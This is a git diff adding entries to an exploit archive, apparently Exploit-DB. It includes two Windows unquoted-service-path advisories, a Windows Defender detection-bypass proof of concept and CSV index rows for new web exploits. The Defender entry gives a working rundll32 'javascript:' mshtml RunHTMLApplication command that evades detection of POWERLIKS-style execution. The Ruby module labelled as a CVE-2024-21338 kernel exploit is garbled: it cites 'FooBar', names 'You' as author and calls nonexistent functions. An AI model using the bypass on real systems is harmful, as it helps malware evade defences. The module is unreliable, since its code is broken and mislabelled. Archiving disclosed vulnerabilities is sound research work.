--- /dev/null
+++ b/exploits/windows/local/51939.txt
@@ -0,0 +1,27 @@
+# Exploit Title: ASUS Control Center Express 01.06.15 - Unquoted Service Path
+Privilege Escalation
+# Date: 2024-04-02
+# Exploit Author: Alaa Kachouh
+# Vendor Homepage:
+https://www.asus.com/campaign/ASUS-Control-Center-Express/global/
+# Version: Up to 01.06.15
+# Tested on: Windows
+# CVE: CVE-2024-27673
+
+===================================================================
+ASUS Control Center Express Version =< 01.06.15 contains an unquoted
+service path which allows attackers to escalate privileges to the system
+level.
+Assuming attackers have write access to C:\, the attackers can abuse the
+Asus service "Apro console service"/apro_console.exe which upon restarting
+will invoke C:\Program.exe with SYSTEM privileges.
+
+The binary path of the service alone isn't susceptible, but upon its
+initiation, it will execute C:\program.exe as SYSTEM.
+
+Service Name: AProConsoleService
+binary impacted: apro_console.exe
+
+# If a malicious payload is inserted into C:\  and service is executed in
+any way, this can grant privileged access to the system and perform
+malicious activities.
\ No newline at end of file
diff --git a/exploits/windows/local/51941.txt b/exploits/windows/local/51941.txt
new file mode 100644
index 000000000..1bbc13a38
--- /dev/null
+++ b/exploits/windows/local/51941.txt
@@ -0,0 +1,35 @@
+# Exploit Title: Rapid7 nexpose - 'nexposeconsole' Unquoted Service Path
+# Date: 2024-04-2
+# Exploit Author: Saud Alenazi
+# Vendor Homepage: https://www.rapid7.com/
+# Software Link: https://www.rapid7.com/products/nexpose/
+# Version: 6.6.240
+# Tested: Windows 10 x64
+
+# Step to discover Unquoted Service Path:
+
+C:\Users\saudh>wmic service where 'name like "%nexposeconsole%"' get name, displayname, pathname, startmode, startname
+
+DisplayName               Name            PathName                                                 StartMode  StartName
+Nexpose Security Console  nexposeconsole  "C:\Program Files\rapid7\nexpose\nsc\bin\nexlaunch.exe"  Auto       LocalSystem
+
+# Service info:
+
+C:\Users\saudh>sc qc nexposeconsole
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: nexposeconsole
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 0   IGNORE
+        BINARY_PATH_NAME   : "C:\Program Files\rapid7\nexpose\nsc\bin\nexlaunch.exe"
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Nexpose Security Console
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/51946.rb b/exploits/windows/local/51946.rb
new file mode 100755
index 000000000..1abdf25b8
--- /dev/null
+++ b/exploits/windows/local/51946.rb
@@ -0,0 +1,70 @@
+#############################################
+# Exploit Title :  Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation
+# Exploit Author: E1 Coders
+# CVE: CVE-2024-21338
+#############################################
+
+ 
+require 'msf/core'
+ 
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+ 
+  include Msf::Exploit::Remote::DCERPC
+  include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact
+ 
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'CVE-2024-21338 Exploit',
+        'Description' => 'This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.',
+        'Author' => 'You',
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-21338']
+        ]
+      )
+    )
+ 
+    register_options(
+      [
+        OptString.new('RHOST', [true, 'The target address', '127.0.0.1']),
+        OptPort.new('RPORT', [true, 'The target port', 1234])
+      ]
+    )
+  end
+ 
+  def check
+    connect
+ 
+    begin
+      impacket_artifact(dcerpc_binding('ncacn_ip_tcp'), 'FooBar')
+    rescue Rex::Post::Meterpreter::RequestError
+      return Exploit::CheckCode::Safe
+    end
+ 
+    Exploit::CheckCode::Appears
+  end
+ 
+  def exploit
+    connect
+ 
+    begin
+      impacket_artifact(
+        dcerpc_binding('ncacn_ip_tcp'),
+        'FooBar',
+        datastore['FooBarPayload']
+      )
+    rescue Rex::Post::Meterpreter::RequestError
+      fail_with Failure::UnexpectedReply, 'Unexpected response from impacket_artifact'
+    end
+ 
+    handler
+    disconnect
+  end
+end
+ 
+ 
+#refrence :  https://nvd.nist.gov/vuln/detail/CVE-2024-21338
+ 
\ No newline at end of file
diff --git a/exploits/windows/local/51960.txt b/exploits/windows/local/51960.txt
new file mode 100644
index 000000000..ab92bc4e5
--- /dev/null
+++ b/exploits/windows/local/51960.txt
@@ -0,0 +1,75 @@
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txt
+[+] twitter.com/hyp3rlinx
+[+] ISR: ApparitionSec
+
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Windows Defender
+
+
+[Vulnerability Type]
+Windows Defender Detection Mitigation Bypass
+TrojanWin32Powessere.G
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail
+and attackers will typically get an "Access is denied" error message.
+
+Back in 2022, I first disclosed how that could be easily bypassed by passing an extra path traversal when referencing mshtml but since has been mitigated.
+Recently Feb 7, 2024, I disclosed using multi-commas "," will bypass that mitigation but has since been fixed again.
+The fix was short lived as I find yet another third trivial bypass soon after.
+
+
+[Exploit/POC]
+Open command prompt as Administrator.
+
+C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(13)
+Access is denied.
+
+C:\sec>rundll32.exe javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ";alert('HYP3RLINX')
+
+
+[Video PoC URL]
+https://www.youtube.com/watch?v=yn9gdJ7c7Kg
+
+
+[Network Access]
+Local
+
+
+[Severity]
+High
+
+
+[References]
+https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt
+https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt
+https://twitter.com/hyp3rlinx/status/1755417914599956833
+https://twitter.com/hyp3rlinx/status/1758624140213264601
+
+
+[Disclosure Timeline]
+Vendor Notification:
+February 16, 2024 : Public Disclosure
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 47afb33f0..12be7ed11 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -2902,6 +2902,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,Local,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
 51257,exploits/go/webapps/51257.py,"Answerdev 1.0.3 - Account Takeover",2023-04-05,"Eduardo Pérez-Malumbres Cervera",webapps,go,,2023-04-05,2023-04-27,1,CVE-2023-0744,,,,,
+51961,exploits/go/webapps/51961.txt,"Casdoor < v1.331.0 - '/api/set-password' CSRF",2024-04-02,"Van Lam Nguyen",webapps,go,,2024-04-02,2024-04-02,0,CVE-2023-34927,,,,,
 51869,exploits/go/webapps/51869.txt,"Ladder v0.0.21 - Server-side request forgery (SSRF)",2024-03-10,@_chebuya,webapps,go,,2024-03-10,2024-03-10,0,CVE-2024-27620,,,,,
 51734,exploits/go/webapps/51734.py,"Minio 2022-07-29T19-40-48Z - Path traversal",2023-10-09,"Jenson Zhao",webapps,go,,2023-10-09,2023-10-09,0,CVE-2022-35919,,,,,
 51497,exploits/go/webapps/51497.txt,"Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32751,,,,,
@@ -3625,6 +3626,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49075,exploits/hardware/remote/49075.py,"Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure",2020-11-19,"Nitesh Surana",remote,hardware,,2020-11-19,2020-11-19,0,CVE-2020-25988,,,,,
 43983,exploits/hardware/remote/43983.py,"Geovision Inc. IP Camera & Video - Remote Command Execution",2018-02-01,bashis,remote,hardware,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/65f7f29ef395d2b6faad91b2a3d62078539a98de/Geovision-PoC.py
 43982,exploits/hardware/remote/43982.txt,"Geovision Inc. IP Camera/Video/Access Control - Multiple Remote Command Execution / Stack Overflow / Double Free / Unauthorized Access",2018-02-01,bashis,remote,hardware,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/65f7f29ef395d2b6faad91b2a3d62078539a98de/Geovision%20IP%20Camera%20Multiple%20Remote%20Command%20Execution%20-%20Multiple%20Stack%20Overflow%20-%20Double%20free%20-%20Unauthorized%20Access.txt
+51942,exploits/hardware/remote/51942.py,"GL-iNet MT6000 4.5.5 - Arbitrary File Download",2024-04-02,"Bandar Alharbi",remote,hardware,,2024-04-02,2024-04-02,0,CVE-2024-27356,,,,,
 51854,exploits/hardware/remote/51854.py,"GL.iNet AR300M v3.216 Remote Code Execution - CVE-2023-46456 Exploit",2024-03-03,cyberaz0r,remote,hardware,,2024-03-03,2024-03-03,0,,,,,,
 51851,exploits/hardware/remote/51851.py,"GL.iNet AR300M v4.3.7 Arbitrary File Read - CVE-2023-46455 Exploit",2024-03-03,cyberaz0r,remote,hardware,,2024-03-03,2024-03-03,0,,,,,,
 51852,exploits/hardware/remote/51852.py,"GL.iNet AR300M v4.3.7 Remote Code Execution - CVE-2023-46454 Exploit",2024-03-03,cyberaz0r,remote,hardware,,2024-03-03,2024-03-03,0,,,,,,
@@ -14488,6 +14490,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 4545,exploits/php/webapps/4545.txt,"awzMB 4.2 Beta 1 - Multiple Remote File Inclusions",2007-10-18,S.W.A.T.,webapps,php,,2007-10-17,2016-10-20,1,OSVDB-44786;CVE-2007-5592;OSVDB-44785;OSVDB-44784;OSVDB-44783;OSVDB-44782;OSVDB-44781,,,,http://www.exploit-db.comawzmb_4.2_beta1.zip,
 4599,exploits/php/webapps/4599.txt,"Ax Developer CMS 0.1.1 - 'index.php?module' Local File Inclusion",2007-11-02,GoLd_M,webapps,php,,2007-11-01,2016-10-20,1,OSVDB-39021;CVE-2007-5820,,,,http://www.exploit-db.comaxdcms-0.1.1.tar.gz,
 15938,exploits/php/webapps/15938.txt,"axdcms-0.1.1 - Local File Inclusion",2011-01-08,n0n0x,webapps,php,,2011-01-08,2011-01-08,1,CVE-2011-0506;OSVDB-70615,,,,http://www.exploit-db.comaxdcms-0.1.1.zip,
+51963,exploits/php/webapps/51963.txt,"Axigen < 10.5.7 - Persistent Cross-Site Scripting",2024-04-02,"Vincent McRae_ Mesut Cetin",webapps,php,,2024-04-02,2024-04-02,0,CVE-2023-48974,,,,,
 3108,exploits/php/webapps/3108.pl,"Axiom Photo/News Gallery 0.8.6 - Remote File Inclusion",2007-01-09,DeltahackingTEAM,webapps,php,,2007-01-08,,1,OSVDB-32716;CVE-2007-0200,,,,,
 17703,exploits/php/webapps/17703.txt,"Axis Commerce (E-Commerce System) - Persistent Cross-Site Scripting",2011-08-20,"Eyup CELIK",webapps,php,,2011-08-20,2011-08-20,0,,,,,http://www.exploit-db.comaxis-0.8.1.zip,
 18793,exploits/php/webapps/18793.txt,"Axous 1.1.0 - SQL Injection",2012-04-27,"H4ckCity Secuirty TeaM",webapps,php,,2012-04-27,2012-04-27,1,OSVDB-81497,,,,,
@@ -15017,6 +15020,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51912,exploits/php/webapps/51912.txt,"Blood Bank 1.0 - 'bid' SQLi",2024-03-20,"Ersin Erenler",webapps,php,,2024-03-20,2024-03-20,0,CVE-2023-46022,,,,,
 50362,exploits/php/webapps/50362.txt,"Blood Bank System 1.0 - Authentication Bypass",2021-10-01,"Nitin Sharma",webapps,php,,2021-10-01,2021-10-28,0,,,,,,
 51833,exploits/php/webapps/51833.txt,"Blood Bank v1.0 - Multiple SQL Injection",2024-02-28,"Ersin Erenler",webapps,php,,2024-02-28,2024-02-28,0,,,,,,
+51955,exploits/php/webapps/51955.txt,"Blood Bank v1.0 - Stored Cross Site Scripting (XSS)",2024-04-02,"Ersin Erenler",webapps,php,,2024-04-02,2024-04-02,0,,,,,,
 51697,exploits/php/webapps/51697.txt,"Blood Donor Management System v1.0 - Stored XSS",2023-09-04,"Ehlullah Albayrak",webapps,php,,2023-09-04,2023-09-06,1,,,,,,
 47842,exploits/php/webapps/47842.txt,"BloodX 1.0 - Authentication Bypass",2020-01-02,riamloo,webapps,php,,2020-01-02,2020-02-07,1,,,,,,
 48786,exploits/php/webapps/48786.txt,"BloodX CMS 1.0 - Authentication Bypass",2020-09-03,BKpatron,webapps,php,,2020-09-03,2020-09-03,0,,,,,,
@@ -15532,6 +15536,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 14560,exploits/php/webapps/14560.txt,"ccTiddly 1.7.6 - Multiple Remote File Inclusions",2010-08-05,eidelweiss,webapps,php,,2010-08-05,2010-08-06,1,CVE-2008-5949;OSVDB-50447,,,,http://www.exploit-db.comccTiddly_v1.7.6.zip,http://eidelweiss-advisories.blogspot.com/2010/08/cctiddly-v176-multiple-remote-file.html
 11401,exploits/php/webapps/11401.txt,"CD Rentals Script - SQL Injection",2010-02-11,"Don Tukulesto",webapps,php,,2010-02-10,,1,OSVDB-62278;CVE-2010-0762,,,,,
 2540,exploits/php/webapps/2540.txt,"Cdsagenda 4.2.9 - 'SendAlertEmail.php' File Inclusion",2006-10-13,Drago84,webapps,php,,2006-10-12,2016-09-12,1,OSVDB-29735;CVE-2006-5384,,,,http://www.exploit-db.comcdsagenda-4.2.9.tar.gz,
+51957,exploits/php/webapps/51957.py,"CE Phoenix v1.0.8.20 - Remote Code Execution",2024-04-02,tmrswrr,webapps,php,,2024-04-02,2024-04-02,0,,,,,,
 22241,exploits/php/webapps/22241.txt,"Cedric Email Reader 0.2/0.3 - Skin Configuration Script Remote File Inclusion",2003-02-09,MGhz,webapps,php,,2003-02-09,2012-10-25,1,CVE-2003-1410;OSVDB-5487,,,,,https://www.securityfocus.com/bid/6818/info
 22242,exploits/php/webapps/22242.txt,"Cedric Email Reader 0.4 - Global Configuration Script Remote File Inclusion",2003-02-09,MGhz,webapps,php,,2003-02-09,2012-10-25,1,CVE-2003-1411;OSVDB-5900,,,,,https://www.securityfocus.com/bid/6820/info
 29624,exploits/php/webapps/29624.txt,"CedStat 1.31 - 'index.php' Cross-Site Scripting",2007-02-21,sn0oPy,webapps,php,,2007-02-21,2013-11-16,1,CVE-2007-1020;OSVDB-33734,,,,,https://www.securityfocus.com/bid/22653/info
@@ -16730,6 +16735,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47213,exploits/php/webapps/47213.txt,"Daily Expense Manager 1.0 - Cross-Site Request Forgery (Delete Income)",2019-08-08,"Mr Winst0n",webapps,php,80,2019-08-08,2019-08-08,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comexpense.zip,
 48737,exploits/php/webapps/48737.txt,"Daily Expenses Management System 1.0 - 'item' SQL Injection",2020-08-07,screetsec,webapps,php,,2020-08-07,2020-08-07,0,,,,,,
 48730,exploits/php/webapps/48730.py,"Daily Expenses Management System 1.0 - 'username' SQL Injection",2020-08-04,"Daniel Ortiz",webapps,php,,2020-08-04,2020-08-04,0,,,,,,
+51954,exploits/php/webapps/51954.md,"Daily Habit Tracker 1.0 - Broken Access Control",2024-04-02,"Yevhenii Butenko",webapps,php,,2024-04-02,2024-04-02,0,CVE-2024-24496,,,,,
+51953,exploits/php/webapps/51953.md,"Daily Habit Tracker 1.0 - SQL Injection",2024-04-02,"Yevhenii Butenko",webapps,php,,2024-04-02,2024-04-02,0,CVE-2024-24495,,,,,
+51952,exploits/php/webapps/51952.md,"Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS)",2024-04-02,"Yevhenii Butenko",webapps,php,,2024-04-02,2024-04-02,0,CVE-2024-24494,,,,,
 13865,exploits/php/webapps/13865.txt,"Daily Inspirational Quotes Script - SQL Injection",2010-06-14,Valentin,webapps,php,,2010-06-13,,1,,,,,,
 48787,exploits/php/webapps/48787.txt,"Daily Tracker System 1.0 - Authentication Bypass",2020-09-03,"Adeeb Shah",webapps,php,,2020-09-03,2020-09-03,0,,,,,,
 47846,exploits/php/webapps/47846.txt,"Dairy Farm Shop Management System 1.0 - 'username' SQL Injection",2020-01-06,"Chris Inzinga",webapps,php,,2020-01-06,2020-02-10,1,,,,,,
@@ -17468,6 +17476,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 37302,exploits/php/webapps/37302.txt,"E-Detective Lawful Interception System - Multiple Vulnerabilities",2015-06-16,"Mustafa Al-Bassam",webapps,php,,2015-06-16,2015-06-16,0,OSVDB-123315;OSVDB-123314,,,,,
 3846,exploits/php/webapps/3846.txt,"E-GADS! 2.2.6 - 'common.php?locale' Remote File Inclusion",2007-05-04,kezzap66345,webapps,php,,2007-05-03,2016-09-30,1,OSVDB-35773;CVE-2007-2521,,,,http://www.exploit-db.come-gads_2.2.6.tar.gz,
 34876,exploits/php/webapps/34876.txt,"E-Gold Game Series: Pirates of The Caribbean - Multiple SQL Injections",2009-08-27,Moudi,webapps,php,,2009-08-27,2014-10-03,1,CVE-2009-3184;OSVDB-57463,,,,,https://www.securityfocus.com/bid/44229/info
+51944,exploits/php/webapps/51944.txt,"E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS)",2024-04-02,"Sandeep Vishwakarma",webapps,php,,2024-04-02,2024-04-02,0,,,,,,
 48629,exploits/php/webapps/48629.txt,"e-learning Php Script 0.1.0 - 'search' SQL Injection",2020-07-01,KeopssGroup0day_Inc,webapps,php,,2020-07-01,2020-07-01,0,,,,,,
 49434,exploits/php/webapps/49434.py,"E-Learning System 1.0 - Authentication Bypass",2021-01-15,"Himanshu Shukla",webapps,php,,2021-01-15,2021-10-29,0,,,,,,
 35027,exploits/php/webapps/35027.txt,"E-lokaler CMS 2 - Admin Login Multiple SQL Injections",2010-11-26,ali_err0r,webapps,php,,2010-11-26,2014-10-21,1,,,,,,https://www.securityfocus.com/bid/45098/info
@@ -17883,6 +17892,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 37572,exploits/php/webapps/37572.txt,"Elefant CMS - 'id' Cross-Site Scripting",2012-08-03,PuN!Sh3r,webapps,php,,2012-08-03,2015-07-11,1,,,,,,https://www.securityfocus.com/bid/54805/info
 26416,exploits/php/webapps/26416.txt,"Elemata CMS RC3.0 - 'global.php?id' SQL Injection",2013-06-24,"CWH Underground",webapps,php,,2013-06-24,2013-06-24,0,OSVDB-94541;CVE-2013-4952,,,,http://www.exploit-db.comElemataRC3.0.zip,
 25951,exploits/php/webapps/25951.txt,"Elemental Software CartWIZ 1.20 - Multiple SQL Injections",2005-07-07,"Diabolic Crab",webapps,php,,2005-07-07,2013-06-05,1,,,,,,https://www.securityfocus.com/bid/14180/info
+51956,exploits/php/webapps/51956.py,"Elementor Website Builder < 3.12.2 - Admin+ SQLi",2024-04-02,"E1 Coders",webapps,php,,2024-04-02,2024-04-02,0,,,,,,
 36925,exploits/php/webapps/36925.py,"elFinder 2 - Remote Command Execution (via File Creation)",2015-05-06,"TUNISIAN CYBER",webapps,php,,2015-05-08,2015-05-08,0,OSVDB-121835,,,,http://www.exploit-db.comelFinder-2.0-rc1.tar.gz,
 46481,exploits/php/webapps/46481.py,"elFinder 2.1.47 - 'PHP connector' Command Injection",2019-03-04,q3rv0,webapps,php,80,2019-03-04,2019-03-13,1,CVE-2019-9194,"Command Injection",,,http://www.exploit-db.comelFinder-2.1.47.tar.gz,https://www.secsignal.org/news/cve-2019-9194-triggering-and-exploiting-a-1-day-vulnerability/
 51864,exploits/php/webapps/51864.txt,"elFinder Web file manager Version - 2.1.53 Remote Command Execution",2024-03-06,tmrswrr,webapps,php,,2024-03-06,2024-03-06,0,,,,,,
@@ -17946,6 +17956,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51911,exploits/php/webapps/51911.txt,"Employee Management System 1.0 - 'admin_id' SQLi",2024-03-20,"Shubham Pandey",webapps,php,,2024-03-20,2024-03-20,0,CVE-2024-28595,,,,,
 48882,exploits/php/webapps/48882.txt,"Employee Management System 1.0 - Authentication Bypass",2020-10-16,"Ankita Pal",webapps,php,,2020-10-16,2020-10-16,0,,,,,,
 48881,exploits/php/webapps/48881.txt,"Employee Management System 1.0 - Cross Site Scripting (Stored)",2020-10-16,"Ankita Pal",webapps,php,,2020-10-16,2020-10-16,0,,,,,,
+51950,exploits/php/webapps/51950.md,"Employee Management System 1.0 - _txtfullname_ and _txtphone_ SQL Injection",2024-04-02,"Yevhenii Butenko",webapps,php,,2024-04-02,2024-04-02,0,CVE-2024-24499,,,,,
+51951,exploits/php/webapps/51951.md,"Employee Management System 1.0 - _txtusername_ and _txtpassword_ SQL Injection (Admin Login)",2024-04-02,"Yevhenii Butenko",webapps,php,,2024-04-02,2024-04-02,0,CVE-2024-24497,,,,,
 51803,exploits/php/webapps/51803.txt,"Employee Management System v1 - 'email' SQL Injection",2024-02-19,SoSPiro,webapps,php,,2024-02-19,2024-02-19,0,,,,,,
 49215,exploits/php/webapps/49215.txt,"Employee Performance Evaluation System 1.0 - 'Task and Description' Persistent Cross Site Scripting",2020-12-08,"Ritesh Gohil",webapps,php,,2020-12-08,2020-12-08,0,,,,,,
 51049,exploits/php/webapps/51049.txt,"Employee Performance Evaluation System v1.0 - File Inclusion and RCE",2023-03-25,nu11secur1ty,webapps,php,,2023-03-25,2023-03-25,0,,,,,,
@@ -18676,6 +18688,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 26132,exploits/php/webapps/26132.txt,"Fobuc Guestbook 0.9 - SQL Injection",2013-06-11,"CWH Underground",webapps,php,,2013-06-11,2013-06-12,1,OSVDB-94208,,,http://www.exploit-db.com/screenshots/idlt26500/screen-shot-2013-06-12-at-13455-pm-1.png,http://www.exploit-db.comFOBUC_0.9.zip,
 4377,exploits/php/webapps/4377.txt,"Focus/SIS 1.0/2.2 - Remote File Inclusion",2007-09-08,"ThE TiGeR",webapps,php,,2007-09-07,,1,OSVDB-36998;CVE-2007-4942;OSVDB-36997;CVE-2007-4807;OSVDB-36953;CVE-2007-4806;OSVDB-36952,,,,,
 25088,exploits/php/webapps/25088.txt,"Foe CMS 1.6.5 - Multiple Vulnerabilities",2013-04-29,flux77,webapps,php,,2013-04-29,2013-04-29,1,OSVDB-92859;OSVDB-92858,,,,http://www.exploit-db.comFoeCMS1.6.5.rar,
+51947,exploits/php/webapps/51947.txt,"FoF Pretty Mail 1.1.2 - Local File Inclusion (LFI)",2024-04-02,"Chokri Hammedi",webapps,php,,2024-04-02,2024-04-02,0,,,,,,
+51948,exploits/php/webapps/51948.txt,"FoF Pretty Mail 1.1.2 - Server Side Template Injection (SSTI)",2024-04-02,"Chokri Hammedi",webapps,php,,2024-04-02,2024-04-02,0,,,,,,
 5784,exploits/php/webapps/5784.txt,"FOG Forum 0.8.1 - Multiple Local File Inclusions",2008-06-11,"CWH Underground",webapps,php,,2008-06-10,,1,OSVDB-46126;CVE-2008-2993,,,,,
 49811,exploits/php/webapps/49811.txt,"FOGProject 1.5.9 - File Upload RCE (Authenticated)",2021-04-29,sml,webapps,php,,2021-04-29,2021-04-29,0,,,,,http://www.exploit-db.comfogproject-1.5.9.tar.gz,
 1778,exploits/php/webapps/1778.txt,"Foing 0.7.0 - 'phpBB' Remote File Inclusion",2006-05-12,"Kurdish Security",webapps,php,,2006-05-11,,1,OSVDB-44302;CVE-2006-2507;OSVDB-44301;OSVDB-44300;OSVDB-44299;OSVDB-44298;OSVDB-25564,,,,,http://kurdishsecurity.blogspot.com/2006/05/kurdish-security-7-foing-remote-file.html
@@ -19224,6 +19238,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 3271,exploits/php/webapps/3271.php,"GGCMS 1.1.0 RC1 - Remote Code Execution",2007-02-05,Kacper,webapps,php,,2007-02-04,,1,OSVDB-35849;CVE-2007-0804,,,,,
 26653,exploits/php/webapps/26653.txt,"GhostScripter Amazon Shop 5.0 - 'search.php' SQL Injection",2005-11-29,r0t,webapps,php,,2005-11-29,2013-07-07,1,CVE-2005-3908;OSVDB-21371,,,,,https://www.securityfocus.com/bid/15634/info
 51903,exploits/php/webapps/51903.py,"Gibbon LMS < v26.0.00 - Authenticated RCE",2024-03-18,"Ali Maharramli_Fikrat  Guliev_Islam Rzayev",webapps,php,,2024-03-18,2024-03-18,0,,,,,,
+51962,exploits/php/webapps/51962.txt,"Gibbon LMS v26.0.00 - SSTI vulnerability",2024-04-02,"Ali Maharramli_Fikrat  Guliev_Islam Rzayev",webapps,php,,2024-04-02,2024-04-02,0,CVE-2024-24724,,,,,
 42442,exploits/php/webapps/42442.txt,"GIF Collection 2.0 - SQL Injection",2017-08-10,"Ihsan Sencan",webapps,php,,2017-08-10,2017-08-10,0,,,,,,
 44718,exploits/php/webapps/44718.txt,"Gigs 2.0 - 'username' SQL Injection",2018-05-23,AkkuS,webapps,php,,2018-05-23,2018-05-23,0,,,,,,
 47185,exploits/php/webapps/47185.txt,"GigToDo 1.3 - Cross-Site Scripting",2019-07-29,m0ze,webapps,php,80,2019-07-29,2019-07-29,0,,"Cross-Site Scripting (XSS)",,,,
@@ -19662,6 +19677,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47840,exploits/php/webapps/47840.txt,"Hospital Management System 4.0 - 'searchdata' SQL Injection",2020-01-02,FULLSHADE,webapps,php,,2020-01-02,2020-02-07,1,CVE-2020-5192,,,,,
 47836,exploits/php/webapps/47836.py,"Hospital Management System 4.0 - Authentication Bypass",2020-01-01,"Metin Yunus Kandemir",webapps,php,,2020-01-01,2020-02-07,1,,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,
 47841,exploits/php/webapps/47841.txt,"Hospital Management System 4.0 - Persistent Cross-Site Scripting",2020-01-02,FULLSHADE,webapps,php,,2020-01-02,2020-02-07,1,CVE-2020-5191,,,,,
+51945,exploits/php/webapps/51945.txt,"Hospital Management System v1.0 - Stored Cross Site Scripting (XSS)",2024-04-02,"Sandeep Vishwakarma",webapps,php,,2024-04-02,2024-04-02,0,,,,,,
 47398,exploits/php/webapps/47398.txt,"Hospital-Management 1.26 - 'fname' SQL Injection",2019-09-18,cakes,webapps,php,,2019-09-18,2019-09-18,1,,,,,http://www.exploit-db.comhospital-management.zip,
 50658,exploits/php/webapps/50658.txt,"Hospitals Patient Records Management System 1.0 - 'doctors' Stored Cross Site Scripting (XSS)",2022-01-13,Sant268,webapps,php,,2022-01-13,2022-01-13,0,,,,,,
 50630,exploits/php/webapps/50630.txt,"Hospitals Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated)",2022-01-05,twseptian,webapps,php,,2022-01-05,2022-01-05,0,,,,,,
@@ -22513,6 +22529,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40248,exploits/php/webapps/40248.txt,"Lepton CMS 2.2.0/2.2.1 - PHP Code Injection",2016-08-16,hyp3rlinx,webapps,php,80,2016-08-16,2016-08-16,0,,,,,http://www.exploit-db.comLEPTON_stable_2.2.0.zip,http://hyp3rlinx.altervista.org/advisories/LEPTON-PHP-CODE-INJECTION.txt
 49137,exploits/php/webapps/49137.txt,"LEPTON CMS 4.7.0 - 'URL' Persistent Cross-Site Scripting",2020-12-01,"Sagar Banwa",webapps,php,,2020-12-01,2020-12-03,0,CVE-2020-29240,,,,,
 48250,exploits/php/webapps/48250.txt,"LeptonCMS 4.5.0 - Persistent Cross-Site Scripting",2020-03-25,SunCSR,webapps,php,,2020-03-25,2020-05-11,0,CVE-2020-12707,,,,,
+51949,exploits/php/webapps/51949.txt,"LeptonCMS 7.0.0 - Remote Code Execution (RCE) (Authenticated)",2024-04-02,tmrswrr,webapps,php,,2024-04-02,2024-04-02,0,,,,,,
